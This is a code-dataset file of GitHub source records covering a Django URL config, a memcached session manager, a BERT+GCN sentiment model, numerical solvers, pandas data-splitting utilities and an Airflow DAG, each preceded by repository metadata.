d6210360f1d53db09d35be26788f86a1171b4b62 | e6febe9aa6c582c07c365a75dce5c2ff1d040b66 | /event_website/urls.py | 3c6b62429d65cba92e9f8d86221c42bf172a418e | [] | no_license | TinkerHub-GCEK/TinkerHub-GCEK-Event-Portal | 9b3cf7f211180d381a32837b695954c75f947f4e | 053d23c1e29d003f141db3317863d0c4a3405011 | refs/heads/master | 2023-07-17T06:51:58.429267 | 2021-08-31T13:46:11 | 2021-08-31T13:46:11 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,103 | py | """event_website URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django import contrib
from django.contrib import admin
from django.urls import path, include
from django.conf import settings
from django.conf.urls.static import static
from django.urls.resolvers import URLPattern
# Project-level routes.  Django tries each pattern in order; the three
# empty-prefix include()s are searched one after another until a route in
# the included URLconf matches.
urlpatterns = [
    path('admin/', admin.site.urls),
    path('',include('event.urls')),
    path('',include('django.contrib.auth.urls')),
    path('',include('admin_user.urls')),
]+ static(settings.MEDIA_URL,document_root=settings.MEDIA_ROOT)  # serve uploaded media (dev only)
| [
"aiswarya2saji@gmail.com"
] | aiswarya2saji@gmail.com |
f5b9e9de541a11697be9f070250c2416341119c2 | 37f6d8d0ec694ddf6e14e926e8b53de35d0e85ee | /lib/session.py | b50fed3d369208e9833550045ca5bc2ed384e9f3 | [
"BSD-3-Clause"
] | permissive | ddong8/ihasy | d2abece2ad69cb19977e1e62e445a8c830493048 | 52e04a56eb896709df7f9fc202238b88cac97b1e | refs/heads/master | 2021-01-24T01:10:57.114379 | 2019-07-07T06:48:50 | 2019-07-07T06:48:50 | 98,000,150 | 2 | 2 | BSD-3-Clause | 2019-07-04T14:27:31 | 2017-07-22T02:03:35 | Python | UTF-8 | Python | false | false | 3,850 | py | #!/usr/bin/env python
# coding=utf-8
#
# Copyright 2017 ihasy.com
# Do have a faith in what you're doing.
# Make your life a story worth telling.
'''
@author: Manuel Mejia
'''
import pickle
import hmac
import uuid
import hashlib
import memcache
class SessionData(dict):
    """A dict of session values carrying the session's id and HMAC key."""

    def __init__(self, session_id, hmac_key):
        super().__init__()
        # Identity attributes live alongside the stored key/value pairs.
        self.session_id = session_id
        self.hmac_key = hmac_key
class Session(SessionData):
    """A user session bound to a request handler.

    On construction the current session is loaded through the
    SessionManager; a brand-new empty session is created when the cookie
    is missing or fails its HMAC check.  The loaded contents are copied
    into this dict so handlers can read/write items directly.
    """
    def __init__(self, session_manager, request_handler):
        self.session_manager = session_manager
        self.request_handler = request_handler
        try:
            current_session = session_manager.get(request_handler)
        except InvalidSessionException:
            # Tampered/invalid cookie: fall back to a fresh session.
            current_session = session_manager.get()
        for key, data in current_session.items():
            self[key] = data
        self.session_id = current_session.session_id
        self.hmac_key = current_session.hmac_key
    def save(self):
        # Persist this session's contents and refresh the cookies.
        self.session_manager.set(self.request_handler, self)
class SessionManager(object):
    """Creates, loads and stores sessions backed by memcached.

    Session identity lives in two secure cookies: "session_id" and
    "verification" (an HMAC-SHA256 of the id keyed by data derived from
    the shared secret), so a client cannot forge a session id.
    """
    def __init__(self, secret, memcached_address, session_timeout):
        self.secret = secret
        self.memcached_address = memcached_address
        self.session_timeout = session_timeout
    def _fetch(self, session_id):
        """Return the unpickled session dict stored under `session_id`,
        or {} when it is missing, malformed, or memcached is unreachable."""
        try:
            mc = memcache.Client(self.memcached_address, debug=0)
            session_data = raw_data = mc.get(session_id)
            if raw_data is not None:
                # Touch the entry so its TTL restarts on every access.
                mc.replace(session_id, raw_data, self.session_timeout, 0)
                session_data = pickle.loads(raw_data)
            if isinstance(session_data, dict):
                return session_data
            return {}
        except IOError:
            return {}
    def get(self, request_handler = None):
        """Return the SessionData for `request_handler`'s cookies.

        With no handler (or no cookie) a fresh session is created.
        Raises InvalidSessionException when the HMAC check fails.
        """
        if request_handler is None:
            session_id = None
            hmac_key = None
        else:
            session_id = request_handler.get_secure_cookie("session_id")
            hmac_key = request_handler.get_secure_cookie("verification")
        if session_id is None:
            session_exists = False
            session_id = self._generate_id()
            hmac_key = self._generate_hmac(session_id)
        else:
            session_exists = True
            check_hmac = self._generate_hmac(session_id)
            if hmac_key != check_hmac:
                raise InvalidSessionException()
        session = SessionData(session_id, hmac_key)
        if session_exists:
            session_data = self._fetch(session_id)
            # BUG FIX: dict.iteritems() is Python 2 only and raised
            # AttributeError here under Python 3; .items() is equivalent.
            for key, data in session_data.items():
                session[key] = data
        return session
    def set(self, request_handler, session):
        """Write the session cookies and persist `session` to memcached."""
        request_handler.set_secure_cookie("session_id", session.session_id)
        request_handler.set_secure_cookie("verification", session.hmac_key)
        session_data = pickle.dumps(dict(session.items()), pickle.HIGHEST_PROTOCOL)
        mc = memcache.Client(self.memcached_address, debug=0)
        mc.set(session.session_id, session_data, self.session_timeout, 0)
    def _generate_id(self):
        """Return a fresh random session id: SHA-256 hex of secret + uuid4."""
        if isinstance(self.secret, str):
            self.secret = str.encode(self.secret)
        raw_id = self.secret + str.encode(str(uuid.uuid4()))
        return hashlib.sha256(raw_id).hexdigest()
    def _generate_hmac(self, session_id):
        """Return the hex HMAC-SHA256 binding `session_id` to the secret.

        BUG FIX: removed leftover debug print() calls that wrote type
        information to stdout on every request.
        """
        if isinstance(session_id, str):
            session_id = str.encode(session_id)
        if isinstance(self.secret, str):
            self.secret = str.encode(self.secret)
        return hmac.new(session_id, self.secret, hashlib.sha256).hexdigest()
class InvalidSessionException(Exception):
    """Raised when a session cookie fails its HMAC verification."""
    pass
| [
"donghaixing2010@hotmail.com"
] | donghaixing2010@hotmail.com |
4fa93a2c63b3b36b637bb87b00f004a255c1b366 | 8560ef45ce8366f8accddcfe672eb1d75bed8475 | /postag_and_none/gcnModel/My_model.py | 76c6b3888cb33fa8b1847f85b9ddba5c8493aac2 | [
"MIT"
] | permissive | taijizuomantou/aspect_level_sentiment | 9c31cdf6e5fc464f3019c9c8455cd7eb69506d10 | 9f8a2f96153aa49db43296f23b12f18fc87ecb4f | refs/heads/main | 2023-05-30T19:00:08.452088 | 2021-06-05T15:18:16 | 2021-06-05T15:18:16 | 374,141,876 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,811 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sun Sep 29 14:12:37 2019
@author: xue
"""
import copy
import json
import math
import six
import torch
import torch.nn as nn
from torch.nn import CrossEntropyLoss
from torch.nn.functional import softmax
from transformers import BertTokenizer, BertModel, BertForMaskedLM
import torch
import numpy as np
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd import Variable
MAX_LENGTH= 128
#class GCNClassifier(nn.Module):
# def __init__(self,num_labels):
# super().__init__()
# in_dim = 768
# self.gcn_model = GCNAbsaModel()
# self.classifier = nn.Linear(in_dim, num_labels)
# def forward(self, inputs):
# outputs = self.gcn_model(inputs)
# logits = self.classifier(outputs)
# return logits, outputs
class GCNAbsaModel(nn.Module):
    """Builds dependency adjacency matrices from head indices and runs the
    token representations through a GCN."""
    def __init__(self):
        super().__init__()
        # gcn layer
        self.gcn = GCN()
    def forward(self, head, gcn_input):
        # head: per-sentence dependency head index for each of the
        # MAX_LENGTH token positions; -1 marks "no head".
        # Assumes gcn_input is (batch, MAX_LENGTH, 768) -- TODO confirm.
        def inputs_to_tree_reps(head):
            # One sentence -> (MAX_LENGTH, MAX_LENGTH) adjacency: an edge
            # from each token to its head, plus self-loops on the diagonal.
            adj = np.zeros((MAX_LENGTH, MAX_LENGTH), dtype=np.float32)
            for i in range(0,MAX_LENGTH):
                if head[i] != -1 :
                    adj[i][head[i]] = 1
                adj[i][i] = 1;
            return adj
        # Stack one adjacency matrix per sentence into (batch, L, L).
        adj = []
        for i,onehead in enumerate(head):
            adj.append(inputs_to_tree_reps(onehead).reshape(1, MAX_LENGTH, MAX_LENGTH) )
        adj = np.concatenate(adj, axis=0)
        adj = torch.from_numpy(adj)
        # NOTE(review): .cuda() returns a new tensor; this call discards its
        # result, so `adj` stays on CPU here (GCN.forward calls .cuda() again).
        adj.cuda()
        h = self.gcn(adj, gcn_input)
        return h
class GCN(nn.Module):
    """Stack of graph-convolution layers: ReLU(A x W / degree)."""
    def __init__(self, num_layers = 2,gcn_dropout = 0.5):
        super(GCN, self).__init__()
        self.gcn_drop = nn.Dropout(gcn_dropout)
        # One 768x768 linear layer per GCN layer.
        self.W = nn.ModuleList()
        for layer in range(num_layers):
            self.W.append(nn.Linear(768, 768))
    def forward(self, adj, gcn_inputs,layer =2):
        # Degree-based normaliser; the +1 avoids division by zero.
        denom = adj.sum(2).unsqueeze(2) + 1 # norm
        # NOTE(review): `layer` must not exceed the num_layers used in
        # __init__, or self.W[l] will raise -- confirm callers.
        for l in range(layer):
            Ax = torch.bmm(adj.cuda(),gcn_inputs.cuda())
            AxW = self.W[l](Ax)
            AxW = AxW/ denom.cuda()
            gAxW = F.relu(AxW)
            # Dropout between layers, but not after the last one.
            gcn_inputs = self.gcn_drop(gAxW) if l < layer - 1 else gAxW
        return gcn_inputs
class BertForSequenceClassification(nn.Module):
    """Joint aspect-detection + sentiment model on top of BERT.

    For each (sentence, aspect) pair the forward pass produces
    detection logits (batch, 2), sentiment logits (batch, 4) and the
    combined training loss.  Two masked attention heads over the token
    encodings pool features for the two tasks, and a dependency GCN
    refines the sentiment attention input.
    """
    def __init__(self, num_labels):
        super(BertForSequenceClassification, self).__init__()
        self.bert = BertModel.from_pretrained("./abc/")
        self.dropout = nn.Dropout(0.1)
        # Task heads over the attention-pooled 768-d features.
        self.classifier_detection = nn.Linear(768, 2)
        self.classifier_sentiment = nn.Linear(768, 4)
        # Learned embedding for the 5 aspect categories.
        self.embedding = nn.Embedding(5,768)
        #self.embedding.weight.data.copy_(self.load_aspect_embedding_weight())
        self.we_d = nn.Linear(768,768)
        self.we_c = nn.Linear(768,768)
        self.wh_d = nn.Linear(768,768)
        self.wh_c = nn.Linear(768,768)
        self.wa_d = nn.Linear(768,768)
        self.wa_c = nn.Linear(768,768)
        self.w_d = nn.Linear(768,1)
        self.w_c = nn.Linear(768,1)
        self.softmax_d = nn.Softmax(dim=1)
        self.softmax_c = nn.Softmax(dim=1)
        self.gcn = GCNAbsaModel()
    def load_aspect_embedding_weight(self):
        """Read pre-trained aspect vectors (whitespace-separated floats,
        one aspect per line) into a float tensor.  Currently unused --
        see the commented-out copy_ call in __init__."""
        f = open("aspect_embedding/aspect_embedding.txt","r")
        weight = []
        while True:
            line = f.readline()
            if len(line) ==0:break
            item = line.split()
            aspect = []
            for num in item:
                num = float(num)
                aspect.append(num)
            weight.append(aspect)
        myw = torch.tensor(weight,dtype = torch.float)
        return myw
    def forward(self, input_ids, token_type_ids, attention_mask, class_labels, detection_lablels,aspects,all_noun_label,all_sent,head):
        """Joint forward pass returning (loss, detection_logits, sentiment_logits).

        Assumes sequences are padded/truncated to 128 tokens and hidden
        size 768 (the hard-coded 128/768 below) -- TODO confirm against
        the tokenizer setup.  all_noun_label / all_sent appear to be 0/1
        token masks: positions with value 1 receive a -1e10 bias before
        the softmax, effectively excluding them from attention.
        """
        aspect_index = torch.tensor([3976,2060,2833,25545,2326]);
        Neg_INF = -1e10
        encode, pooled_output = self.bert(input_ids, attention_mask=attention_mask,token_type_ids= token_type_ids,)
        pooled_output = self.dropout(pooled_output)
        encode = self.dropout(encode)
        # Broadcast the aspect embedding across all 128 token positions.
        aspect_embed = self.embedding(aspects)
        aspect_embed = aspect_embed.unsqueeze(1)
        full_aspect_embed = aspect_embed.expand(-1,128,768)
        # Detection attention mask (large negative bias on flagged tokens).
        noun_label = all_noun_label.unsqueeze(-1)
        temp_noun_label = noun_label.repeat(1,1,1)
        noun_label = temp_noun_label * Neg_INF + 1
        Md = self.wh_d(encode)*(full_aspect_embed)
        attention_d = self.softmax_d(self.w_d(Md) * noun_label)
        temp_encode = encode.permute(0,2,1)
        r_d = torch.bmm(temp_encode,attention_d).squeeze(-1)
        detection_logits = self.classifier_detection(r_d)
        # Attention-weighted encodings feed the dependency GCN.
        my_d = encode * attention_d
        abc = self.gcn(head,my_d)
        # Sentiment attention mask, built the same way from all_sent.
        sent_label = all_sent.unsqueeze(-1)
        temp_sent_label = sent_label.repeat(1,1,1)
        un_noun_label =temp_sent_label* Neg_INF + 1
        Mc = self.wh_c(encode)*(full_aspect_embed)+self.we_c(Md) + abc
        attention_c = self.softmax_c(self.w_c(Mc) * un_noun_label)
        temp_encode = encode.permute(0,2,1)
        r_c = torch.bmm(temp_encode,attention_c).squeeze(-1)
        sentiment_logits = self.classifier_sentiment(r_c)
        # Detection loss + sentiment loss; sentiment label 4 is ignored
        # (CrossEntropyLoss ignore_index=4).
        loss_fct = CrossEntropyLoss()
        loss = loss_fct(detection_logits, detection_lablels)
        loss_fct_2 = CrossEntropyLoss(ignore_index=4)
        loss = loss + loss_fct_2(sentiment_logits,class_labels)
        # Attention regulariser on positive detection examples:
        # 1 - sum(a^2)/batch is minimised when attention is peaked.
        attention_d = attention_d.squeeze(-1)
        sizee = full_aspect_embed.size(0)
        my_detection_labels = detection_lablels.gt(0)
        my_detection_labels = my_detection_labels.repeat(128,1).permute(1,0)
        detect_attention_d = torch.masked_select(attention_d,my_detection_labels)
        attention_loss_d = 1 - torch.sum(torch.mul(detect_attention_d,detect_attention_d))/sizee
        loss = loss +attention_loss_d
        return loss, detection_logits,sentiment_logits
"719222033@qq.com"
] | 719222033@qq.com |
6978a14d61f5e732c14d26d2b0b74e1205218b1e | 20971847b3f7f2655c74986469688402e298365e | /w5/4.py | e2586424a3bed040ead58d35267f4a27d4cd3e8c | [] | no_license | pythonium/mipt_hw_py | da5c3046a4bebf732c3cb239b3fd8a95fdcbc756 | 884defc6698ea74dfb0b3e8c41cc9c05a5572e07 | refs/heads/master | 2023-06-04T03:44:31.600105 | 2020-12-21T12:31:32 | 2020-12-21T12:31:32 | 298,569,191 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 427 | py | class Shape():
    def __init__(self, height, length):
        # Base figure defined by two dimensions used by subclasses' area.
        self.height = height
        self.length = length
    def get_area(self):
        # Abstract: every concrete shape must override this method.
        raise NotImplementedError()
class Triangle(Shape):
    """Triangle with base `length` and height `height`."""

    def get_area(self):
        # Area of a triangle: base * height / 2.
        return self.height * self.length / 2
class Rectangle(Shape):
    """Rectangle with sides `height` and `length`."""

    def get_area(self):
        # Area of a rectangle: the product of its two sides.
        return self.height * self.length
# Quick demo: both shapes share the same (3, 4) dimensions.
t = Triangle(3, 4)
print(t.get_area())  # 6.0
r = Rectangle(3, 4)
print(r.get_area())  # 12
| [
"artiukh.va@phystech.edu"
] | artiukh.va@phystech.edu |
0bf7dd56ef9f8d3dc81a166b9e292152ff8911ac | 2aba3c043ce4ef934adce0f65bd589268ec443c5 | /AOJ/courses/ITP1/3_C.py | 221621fc02dd16be341b7f831191bed733e02394 | [] | no_license | kambehmw/algorithm_python | 4f66593b77039d90515d1fcbecacdab8c811b92f | 17222399dcc92fd8f908e5774a9883e2e89c486e | refs/heads/master | 2020-06-02T12:44:11.322356 | 2020-05-18T13:22:05 | 2020-05-18T13:22:05 | 191,157,113 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 179 | py | while True:
    x, y = map(int, input().split())
    # The pair "0 0" marks the end of input.
    if x == 0 and y == 0:
        exit()
    else:
        # Print the two values in ascending order.
        if x < y:
            print(x, y)
        else:
            print(y, x)
"kanbe.hmw@gmail.com"
] | kanbe.hmw@gmail.com |
d8adcfa0328f753994b60200ace6ca4d145e0f23 | 3d5bcd57b893c95bbcbfafe77bbc33c65432c9ed | /Algorithms/LeetCode/L0079exist.py | c6486ef5bca5b6781c64631e90da4eed40b18976 | [] | no_license | arunachalamev/PythonProgramming | c160f34c7cb90e82cd0d4762ff9dcb4abadf9c1c | ea188aaa1b72511aeb769a2829055d0aae55e73e | refs/heads/master | 2021-06-04T03:50:37.976293 | 2020-11-12T19:52:28 | 2020-11-12T19:52:28 | 97,364,002 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 702 | py |
def exist(board, word):
    """Return True if `word` can be spelled by walking orthogonally
    adjacent cells of `board`, using each cell at most once (LeetCode 79).

    The board is mutated during the search (visited cells are marked
    with '#') but is always restored before returning.  Passes the
    remaining-word INDEX instead of slicing word[1:] at every step,
    avoiding an O(len(word)) copy per recursive call.  Also guards the
    empty grid, which previously raised IndexError on len(board[0]).
    """
    if not board or not board[0]:
        # Degenerate grid: no cells, so no word (even "") can be traced,
        # matching the original behaviour for [[]].
        return False
    m, n = len(board), len(board[0])

    def search(i, j, k):
        # Can word[k:] be traced starting from cell (i, j)?
        if k == len(word):
            return True
        if i < 0 or i == m or j < 0 or j == n or board[i][j] != word[k]:
            return False
        board[i][j] = '#'  # mark visited for the current path
        found = any(search(i + di, j + dj, k + 1)
                    for di, dj in ((0, 1), (0, -1), (1, 0), (-1, 0)))
        board[i][j] = word[k]  # restore the cell
        return found

    return any(search(i, j, 0) for i in range(m) for j in range(n))
# Demo: 'ABCCEDX' cannot be traced through this grid, so prints False.
print (exist([
['A','B','C','E'],
['S','F','C','S'],
['A','D','E','E']
], 'ABCCEDX'))
"arunachalamev@gmail.com"
] | arunachalamev@gmail.com |
1cc0adc5290897487fb3cebc76c77f1b77f1045f | 21197acf6174f971129de1430a835078d1007fc3 | /Maestro/venv/Scripts/easy_install-3.6-script.py | ea5f671fa14190a56ba5840de3db399aff53073b | [] | no_license | khrisnakamarga/roboticeyetracker | 742056921a485185db1fc8d7b61979e294345614 | 0d629ed2de546ab87720a0e0bb39d4118d97af51 | refs/heads/master | 2020-04-20T09:17:10.890610 | 2019-06-13T01:05:42 | 2019-06-13T01:05:42 | 168,761,554 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 474 | py | #!"C:\Users\Khrisna Adi Kamarga\PycharmProjects\Maestro\venv\Scripts\python.exe"
# EASY-INSTALL-ENTRY-SCRIPT: 'setuptools==39.1.0','console_scripts','easy_install-3.6'
# Auto-generated console-script shim for easy_install; do not edit by hand.
__requires__ = 'setuptools==39.1.0'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
    # Strip the '-script.py' / '.exe' suffix so argv[0] matches the
    # console-script name, then run the entry point and exit with its code.
    sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
    sys.exit(
        load_entry_point('setuptools==39.1.0', 'console_scripts', 'easy_install-3.6')()
    )
| [
"khrisna@uw.edu"
] | khrisna@uw.edu |
5e16b4a54f5d2c337a515df81ead29768326edb9 | b8a1de0ce5bd93dd15c39b9391ebd37bb0b85acf | /Metodos_Numerico/met-elim-exemplo.py | 7df28e1d97174fd3fc279f96e0ee2af221dc32d1 | [] | no_license | brunolobell/calculo-numerico | 69993428e936ae997a12652a2c42f3b28922d559 | 9ecffd551d4c43c2439127fb8bef42bfda4e08b4 | refs/heads/master | 2023-06-20T16:41:11.243225 | 2021-07-19T17:59:21 | 2021-07-19T17:59:21 | 298,431,653 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,759 | py | import numpy as np
def gaussjac(A,B,p):
    """Solve A x = B by the Gauss-Jacobi iterative method.

    Args:
        A: coefficient matrix (n x n).
        B: right-hand-side vector.
        p: precision -- iterate until max|x_new - x_old| <= p.

    Returns:
        (x, k): solution vector and iteration count, or
        ('Não converge', 0) when the row criterion alpha >= 1 rejects
        convergence up front.
    """
    n = np.max(np.shape(A))
    k = 0                # iteration counter
    x0 = np.zeros(n)     # previous iterate
    alf = np.zeros(n)    # row-criterion values
    # Row criterion: alpha_i = sum_{j != i} |a_ij| / |a_ii|;
    # convergence is guaranteed when max(alpha) < 1.
    for i in range(n):
        x0[i] = 1        # initial guess: all ones
        s = 0
        for j in range(n):
            if j != i:
                s = s + abs(A[i][j])
        alf[i] = s/abs(A[i][i])
    x = np.zeros(n)
    if np.max(alf) < 1:
        test = 1000      # sentinel to force at least one iteration
        while test > p:
            k += 1
            # Jacobi update: every x[i] uses only the PREVIOUS iterate x0.
            for i in range(n):
                s = 0
                for j in range(n):
                    if j != i:
                        s = s + (A[i][j] * x0[j])
                x[i] = (B[i] - s) / A[i][i]
            test = np.max(np.absolute(x - x0))
            x0 = x.copy()
        x = np.transpose(x)
    else:
        x='Não converge'
    return x, k
def gausssid(A,B,p):
    """Solve A x = B by the Gauss-Seidel iterative method.

    Args:
        A: coefficient matrix (n x n).
        B: right-hand-side vector.
        p: precision -- iterate until max|x_new - x_old| <= p.

    Returns:
        (x, k): solution vector and iteration count, or
        ('Não Converge', 0) when the Sassenfeld criterion beta >= 1
        rejects convergence up front.
    """
    n = np.max(np.shape(A))
    k = 0                # iteration counter
    x0 = np.zeros(n)     # previous iterate (for the stop test)
    bet = np.zeros(n)    # Sassenfeld-criterion values
    # Sassenfeld criterion: beta_i sums |a_ij| for j > i and
    # beta_j * |a_ij| for j < i; convergence guaranteed if max(beta) < 1.
    for i in range(n):
        x0[i] = 0.5
        s = 0
        for j in range(n):
            if j != i:
                if j > i:
                    s = s + abs(A[i][j])
                else:
                    s = s + (bet[j] * abs(A[i][j]))
        bet[i] = s / abs(A[i][i])
    x = np.full(n, 0.5)  # initial guess: all 0.5
    if np.max(bet) < 1:
        teste = 1000     # sentinel to force at least one iteration
        while teste > p:
            k += 1
            # Seidel update: x[j] already holds the NEW value for j < i.
            for i in range(n):
                s = 0
                for j in range(n):
                    if j != i:
                        s = s + (A[i][j] * x[j])
                x[i] = (B[i] - s)/A[i][i]
            teste = np.max(np.absolute(x - x0))
            x0 = x.copy()
        x = np.transpose(x)
    else:
        x = 'Não Converge'
    return x, k
# Example system: strictly diagonally dominant, so both convergence
# criteria hold and the methods converge.
A = np.array([[10,-1,1],[2,-8,-1],[3,-4,6]])
print(A)
B = np.array([[1],[-7],[5]])
print(B)
print(gaussjac(A,B,10**(-10)))
"brunolobell2@gmail.com"
] | brunolobell2@gmail.com |
690be92bc4c100a3e5a2d7daa4f95f72525baeba | 262e4b8eedca76db35f365ef6c0fb8bc66859d2c | /lab2/rectangle.py | e9e5b845fd3883e39f24cbce82cdc865bde22b24 | [] | no_license | xgamez/lab-5-sem | 601b0f694f5006a826bc8222f4be4b3010f32eec | aa08dfae3cf45ce82cc8e0ecd24208d33afd28cc | refs/heads/master | 2023-02-22T05:31:32.616017 | 2021-01-28T13:39:46 | 2021-01-28T13:39:46 | 297,439,424 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,437 | py | from figure import Figure
from figurecolor import FigureColor
class Rectangle(Figure):
"""
Класс «Прямоугольник» наследуется от класса «Геометрическая фигура».
"""
FIGURE_TYPE = "Прямоугольник"
@classmethod
def get_figure_type(cls):
return cls.FIGURE_TYPE
def __init__(self, color_param, width_param, height_param):
"""
Класс должен содержать конструктор по параметрам «ширина», «высота» и «цвет». В конструкторе создается объект класса «Цвет фигуры» для хранения цвета.
"""
self.width = width_param
self.height = height_param
self.fc = FigureColor()
self.fc.colorproperty = color_param
def square(self):
"""
Класс должен переопределять метод, вычисляющий площадь фигуры.
"""
return self.width*self.height
def __repr__(self):
return '\033[34m{}\033[0m {} цвета шириной {} и высотой {} площадью {}.'.format(
Rectangle.get_figure_type(),
self.fc.colorproperty,
self.width,
self.height,
self.square()
)
| [
"noreply@github.com"
] | noreply@github.com |
e1c7467f290a0ff997e0765bd20992139eacda23 | 9cf0e51720a58e648141cc7e1fd927a9c04a8a15 | /data/utils.py | 7c92a6ba99e9328956e7c382d3ce6e42b11a3da0 | [
"MIT"
] | permissive | wubinzzu/NeuRec | 8c7c0217f304b64b4673baeea12b0e610b664747 | 9e9391bfe45f65977b0b06dfb8f7feae5e760286 | refs/heads/master | 2023-08-23T14:56:18.663462 | 2021-11-26T07:41:48 | 2021-11-26T07:41:48 | 172,490,285 | 1,107 | 237 | null | 2023-03-24T22:42:26 | 2019-02-25T11:05:36 | Python | UTF-8 | Python | false | false | 3,272 | py | """
@author: Zhongchuan Sun
"""
import pandas as pd
import math
import hashlib
import os
def check_md5(file_name):
if not os.path.isfile(file_name):
raise FileNotFoundError("There is not file named '%s'!" % file_name)
with open(file_name, "rb") as fin:
bytes = fin.read() # read file as bytes
readable_hash = hashlib.md5(bytes).hexdigest()
return readable_hash
def load_data(filename, sep, columns):
data = pd.read_csv(filename, sep=sep, header=None, names=columns)
return data
def filter_data(data, user_min=None, item_min=None):
data.dropna(how="any", inplace=True)
if item_min is not None and item_min > 0:
item_count = data["item"].value_counts(sort=False)
filtered_idx = data["item"].map(lambda x: item_count[x] >= item_min)
data = data[filtered_idx]
if user_min is not None and user_min > 0:
user_count = data["user"].value_counts(sort=False)
filtered_idx = data["user"].map(lambda x: user_count[x] >= user_min)
data = data[filtered_idx]
return data
def remap_id(data):
unique_user = data["user"].unique()
user2id = pd.Series(data=range(len(unique_user)), index=unique_user)
data["user"] = data["user"].map(user2id)
unique_item = data["item"].unique()
item2id = pd.Series(data=range(len(unique_item)), index=unique_item)
data["item"] = data["item"].map(item2id)
return data, user2id, item2id
def get_map_id(data):
unique_user = data["user"].unique()
user2id = pd.Series(data=range(len(unique_user)), index=unique_user)
unique_item = data["item"].unique()
item2id = pd.Series(data=range(len(unique_item)), index=unique_item)
return user2id.to_dict(), item2id.to_dict()
def split_by_ratio(data, ratio=0.8, by_time=True):
if by_time:
data.sort_values(by=["user", "time"], inplace=True)
else:
data.sort_values(by=["user", "item"], inplace=True)
first_section = []
second_section = []
user_grouped = data.groupby(by=["user"])
for user, u_data in user_grouped:
u_data_len = len(u_data)
if not by_time:
u_data = u_data.sample(frac=1)
idx = math.ceil(ratio*u_data_len)
first_section.append(u_data.iloc[:idx])
second_section.append(u_data.iloc[idx:])
first_section = pd.concat(first_section, ignore_index=True)
second_section = pd.concat(second_section, ignore_index=True)
return first_section, second_section
def split_by_loo(data, by_time=True):
if by_time:
data.sort_values(by=["user", "time"], inplace=True)
else:
data.sort_values(by=["user", "item"], inplace=True)
first_section = []
second_section = []
user_grouped = data.groupby(by=["user"])
for user, u_data in user_grouped:
u_data_len = len(u_data)
if u_data_len <= 3:
first_section.append(u_data)
else:
if not by_time:
u_data = u_data.sample(frac=1)
first_section.append(u_data.iloc[:-1])
second_section.append(u_data.iloc[-1:])
first_section = pd.concat(first_section, ignore_index=True)
second_section = pd.concat(second_section, ignore_index=True)
return first_section, second_section
| [
"iezcsun@gs.zzu.edu.cn"
] | iezcsun@gs.zzu.edu.cn |
393141123c2bff2f5a54636ca0bcb17fcc5d2927 | b3b8db13b83d7dcda1afd8640eeed2b9d3df9cdc | /transfer/dags/transfer.py | c4c688495cb0ff4b5add6ddcb3ed5fb276163c2d | [] | no_license | grokkerzz/airflow_job | eeffab67718b90467b09103dfbe8eea2a03cb6b2 | 9542daf16f1251dddad52357d4385e7804e66a29 | refs/heads/master | 2023-05-11T15:19:16.292091 | 2019-09-12T03:38:37 | 2019-09-12T03:38:37 | 207,725,132 | 0 | 0 | null | 2023-05-08T20:28:20 | 2019-09-11T04:45:51 | Dockerfile | UTF-8 | Python | false | false | 861 | py | from __future__ import print_function
from datetime import datetime
from datetime import timedelta
import airflow
from airflow.models import DAG
from airflow.operators.bash_operator import BashOperator
args = {
'owner': 'airflow',
'run_as_user': 'root',
'start_date': airflow.utils.dates.days_ago(2),
}
dag = DAG(
dag_id='transfer_mysql_and_csv_to_postgres',
default_args=args,
schedule_interval='0 0 * * *',
dagrun_timeout=timedelta(minutes=60),
)
mysql_to_postgres = BashOperator(
task_id='transfer_data_from_mysql_to_postgres',
bash_command="/usr/local/airflow/bashcommand/mysql_to_postgres.sh ",
dag=dag
)
csv_to_postgres = BashOperator(
task_id='transfer_data_from_csv_to_postgres',
bash_command="/usr/local/airflow/bashcommand/csv_to_postgres.sh ",
dag=dag
)
mysql_to_postgres >> csv_to_postgres
| [
"phuong.nguyen@dinovative.com"
] | phuong.nguyen@dinovative.com |
62c9707a1856156262ef41e416de9dc8f0816af2 | 34febb6e20d0461862bc03d6d6d738335644b5c8 | /tadhack/manage.py | 5becd0dd4a44a06d2e638762384a28a6ab3573b9 | [] | no_license | prosper1/verify-my-prescription | e9011592e11300c3d8fdddfa6223882640e705ce | 55ff92133919186d05514faa5b2df8a71f78d4f9 | refs/heads/main | 2022-12-27T15:41:39.442310 | 2020-10-11T08:58:52 | 2020-10-11T08:58:52 | 302,725,638 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 663 | py | #!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
"""Run administrative tasks."""
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'tadhack.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
| [
"gundotshili@gmail.com"
] | gundotshili@gmail.com |
